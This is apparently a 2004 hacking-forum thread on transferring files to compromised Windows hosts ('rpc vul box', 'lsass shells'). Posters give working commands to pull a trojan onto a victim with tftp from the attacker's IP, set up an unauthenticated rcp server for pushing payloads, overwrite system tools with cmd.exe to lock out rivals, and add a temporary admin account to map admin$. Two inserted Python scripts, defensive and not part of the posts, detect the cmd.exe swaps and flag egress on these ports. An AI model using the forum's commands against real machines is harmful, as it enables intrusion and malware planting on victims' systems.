Full Version: Rcp Transfer ?
Nostremato
Is it possible to use RCP for transfers like ftp? Because I was searching a lot in Google and in the Windows Help dir *g* but I don't understand the preferences ... so maybe someone can tell me how I can use rcp

thx
Ash
Do you mean getting files from ftp on a rpc vul box? If you are..
Get a tftp server installed and share your trojan server or w/e you want the victim to download, then simply run the tftp, go to your rpc vic and in command prompt type
"tftp -i YOURIP GET trojan.exe" without quotes, replace YOURIP and trojan.exe and hit enter and it should get trojan.exe from your computer
TaScam
Ok this is a great solution because sometimes the ftp.exe and tftp.exe are just renamed cmd.exe's
now i gonna try to explain how to do in my best English



1) Download QVTNET32 from Here

2) Extract it to a directory like c:\RCP or something you like. This is your homedir and there we put the files in later.

3) Now in your extracted dir you have a file named QVTNET32.EXE, double click on it and go to Services >> Servers
and set the option RCP Server to on. In the frame with text Password File you set rcpass.txt and press ok

4) Now open the file Passwd.exe with cmd.exe (dos). The file is also in your extracted dir. Then you see something like this:


WinQVT/Net Password File Utility

Usage: passwd <filename>
So then you type:
passwd rcpass.txt



5) Now you see this :

WinQVT/Net Password File Utility

New file.

Usernames:


Enter Option (C[number]=Change, A=Add, D[number]=Delete, E=Exit):

now we do these steps :
------------------------
Add User: SomeUser
Username: SomeUser
Password:
Verify:
Usernames:
1. SomeUser



6) Ok almost finished. Put all files you want to transfer into your rcp dir. Now thats it.

7) Now you want to know the transfer part i think
rcp -b YOURIP.SomeUser:File.exe File.exe
For example my ip is 80.200.0.1 and i want to transfer the file named instsrv.exe then the command = :
rcp -b 80.200.0.1.SomeUser:instsrv.exe instsrv.exe
now just w8 one sec and the File will be on the Machine


So thats it ... Sorry if my English is not so good. And i hope i wrote an easy to understand tut for you.
and if you have Questions you can always PM me


Greetz TaScam
Chinzo
Lol, that's an explosive trick thanks to you c°h°, lol, very very good i didn't know that trick, anyone will have to rename a .exe more on their box, thanks...
TaScam
yes sometimes they do this.

copy cmd.exe ftp.exe /y
copy cmd.exe tftp.exe /y
copy cmd.Exe net.exe
the net part you do after you started your ftp server like net start blablabla
then they can not do the net start command anymore. And you can always put the file net.exe back with rcp now
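A defender's check for the tampering TaScam describes (ftp.exe, tftp.exe and net.exe overwritten with copies of cmd.exe), as an added example that is not part of the original posts. It assumes you can read the system directory of a live host or a mounted image; the function names are hypothetical.

```python
import hashlib
from pathlib import Path

# Binaries the thread names as being overwritten with cmd.exe.
WATCHED = ("ftp.exe", "tftp.exe", "net.exe")

def sha256_of(path, chunk=1 << 16):
    """Hash a file in chunks so large binaries are not read into memory at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            digest.update(block)
    return digest.hexdigest()

def find_cmd_copies(system_dir, reference="cmd.exe"):
    """Return {lowercased name: Path} of .exe files byte-identical to the reference."""
    # Windows names are case-insensitive, so compare on the lowercased name.
    files = {p.name.lower(): p for p in Path(system_dir).iterdir() if p.is_file()}
    ref = files.get(reference.lower())
    if ref is None:
        raise FileNotFoundError(f"{reference} not found in {system_dir}")
    ref_size, ref_hash = ref.stat().st_size, sha256_of(ref)
    copies = {}
    for name, path in files.items():
        if name == reference.lower() or not name.endswith(".exe"):
            continue
        # Cheap size check first; hash only files that could match.
        if path.stat().st_size == ref_size and sha256_of(path) == ref_hash:
            copies[name] = path
    return copies

def triage(system_dir):
    """Summarise: watched tools replaced, other copies, watched tools absent."""
    copies = find_cmd_copies(system_dir)
    present = {p.name.lower() for p in Path(system_dir).iterdir() if p.is_file()}
    return {
        "watched_replaced": sorted(n for n in copies if n in WATCHED),
        "other_copies": sorted(n for n in copies if n not in WATCHED),
        "watched_missing": sorted(n for n in WATCHED if n not in present),
    }

if __name__ == "__main__":
    import sys
    # Usage: python check_cmd_copies.py <system directory of a host or image>
    for key, names in triage(sys.argv[1]).items():
        print(f"{key}: {', '.join(names) or '-'}")
```

Any name under watched_replaced or other_copies is a command shell under another name and worth treating as evidence of prior access.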
globe7
tnx alot for the rcp tut.
its useful when ftp dont work and tftp 2
HAnzsz
l0l,

well I dont know if you tested it but my provider disabled the rcp port.

and I thought almost all other providers on this planet did the same thing..

So, for me [and many others]... its a useless transfer method
DaRul0r
but on some Servers it works...
DumpZ
I was wondering if there is also a cmd prompt based RCP server, i tried looking on google but i didn't have any luck.

I only found how to set it up in Linux, with RSH, but that's no good
Psychotec
QUOTE (TaScam @ Feb 2 2004, 03:02 AM)
Ok this is a great solution because sometimes the ftp.exe and tftp.exe are just renamed cmd.exe's
now i gonna try to explain how to do in my best English



1) Download QVTNET32 from Here

2) Extract it to a directory like c:\RCP or something you like. This is your homedir and there we put the files in later.

3) Now in your extracted dir you have a file named QVTNET32.EXE, double click on it and go to Services >> Servers
and set the option RCP Server to on. In the frame with text Password File you set rcpass.txt and press ok

4) Now open the file Passwd.exe with cmd.exe (dos). The file is also in your extracted dir. Then you see something like this:


WinQVT/Net Password File Utility

Usage: passwd <filename>
So then you type:
passwd rcpass.txt



5) Now you see this :

WinQVT/Net Password File Utility

New file.

Usernames:


Enter Option (C[number]=Change, A=Add, D[number]=Delete, E=Exit):

now we do these steps :
------------------------
Add User: SomeUser
Username: SomeUser
Password:
Verify:
Usernames:
1. SomeUser



6) Ok almost finished. Put all files you want to transfer into your rcp dir. Now thats it.

7) Now you want to know the transfer part i think
rcp -b YOURIP.SomeUser:File.exe File.exe
For example my ip is 80.200.0.1 and i want to transfer the file named instsrv.exe then the command = :
rcp -b 80.200.0.1.SomeUser:instsrv.exe instsrv.exe
now just w8 one sec and the File will be on the Machine


So thats it ... Sorry if my English is not so good. And i hope i wrote an easy to understand tut for you.
and if you have Questions you can always PM me


Greetz TaScam

looks like some1 tries to be smart...LOL

lol...are you kidding me?? you didnt write that tutorial..cuz i posted that one here before.....and if LAZY people just open their eyez and start searching (YES YOU CAN ALSO SEARCH THE FORUM) they could have found it....


Psychotec
QUOTE (HAnzsz @ Feb 4 2004, 09:26 AM)
l0l,

well I dont know if you tested it but my provider disabled the rcp port.

and I thought almost all other providers on this planet did the same thing..

So, for me [and many others]... its a useless transfer method

also bullshit...i know you..and i know you live in the Netherlands and dont tell me this tutorial doesnt work...cuz i tested it over 10 times and all worked fine....

maybe you are behind a router...then it wont work (open DMZ or open rcp port)

RCP ALWAYS WORKS!!!
Qlimax
QUOTE
RCP ALWAYS WORKS!!!

not always:

C:\>rcp
rcp
Access is denied.
el33t
I just tested under a sql shell and it works well!

Killaloop
as long as port 139 or 445 are opened use xcopy to copy the files to the harddisk, or map the remote admin$ share.
all you need to do is make yourself a temporary admin account.
map the admin$ share to your Z drive and drag-n-drop the files over.
Done
works for all of your lsass shells if this is why you asked
el33t
Correction about the above QVTNET32 tut:

You don't have to add a new user! After rcp server starts, anyone can get any files
on your system without auth!

e.g.

rcp -b 12.34.56.78.a:c:\boot.ini boot.ini

Just shutdown your rcp server after victim d/l the files asap.
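The thread turns on whether outbound rcp is blocked (HAnzsz, Psychotec) and names tftp, ftp and SMB on 139/445 as alternatives. The following added example, not part of the original thread, flags internal-to-external flows on those services in a firewall log. The log format, the internal ranges and the function names are assumptions; the ports are the standard assignments (rcp uses the rsh service on 514/tcp), and the external addresses are the thread's own example IPs.

```python
import ipaddress
import re

# Standard service ports for the transfer methods named in the thread.
WATCHED_PORTS = {
    ("tcp", 514): "rcp/rsh",
    ("udp", 69): "tftp",
    ("tcp", 21): "ftp",
    ("tcp", 139): "smb-netbios",
    ("tcp", 445): "smb",
}
# Assumption: these ranges are the organisation's internal address space.
INTERNAL = [ipaddress.ip_network(n)
            for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Assumed log format: "<timestamp> <ALLOW|DENY> <TCP|UDP> src:port -> dst:port"
LINE = re.compile(
    r"^(?P<ts>\S+) (?P<action>ALLOW|DENY) (?P<proto>TCP|UDP) "
    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$")

def is_internal(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL)

def flag_egress(lines):
    """Return (ts, src, dst, service, action) for internal->external watched flows."""
    alerts = []
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue  # skip lines that do not match the assumed format
        service = WATCHED_PORTS.get((m["proto"].lower(), int(m["dport"])))
        # Denied attempts are kept too: a blocked pull is still a lead.
        if service and is_internal(m["src"]) and not is_internal(m["dst"]):
            alerts.append((m["ts"], m["src"], m["dst"], service, m["action"]))
    return alerts

# Constructed sample log lines, not captured traffic.
SAMPLE_LOG = """\
2004-02-04T09:26:11 ALLOW TCP 10.0.5.20:1022 -> 80.200.0.1:514
2004-02-04T09:26:40 ALLOW UDP 10.0.5.20:1045 -> 80.200.0.1:69
2004-02-04T09:27:02 ALLOW TCP 10.0.5.20:1050 -> 10.0.9.3:445
2004-02-04T09:27:30 DENY TCP 10.0.7.8:1023 -> 12.34.56.78:514
2004-02-04T09:28:00 ALLOW TCP 10.0.5.21:3312 -> 80.200.0.1:80
""".splitlines()

if __name__ == "__main__":
    for alert in flag_egress(SAMPLE_LOG):
        print(*alert)
```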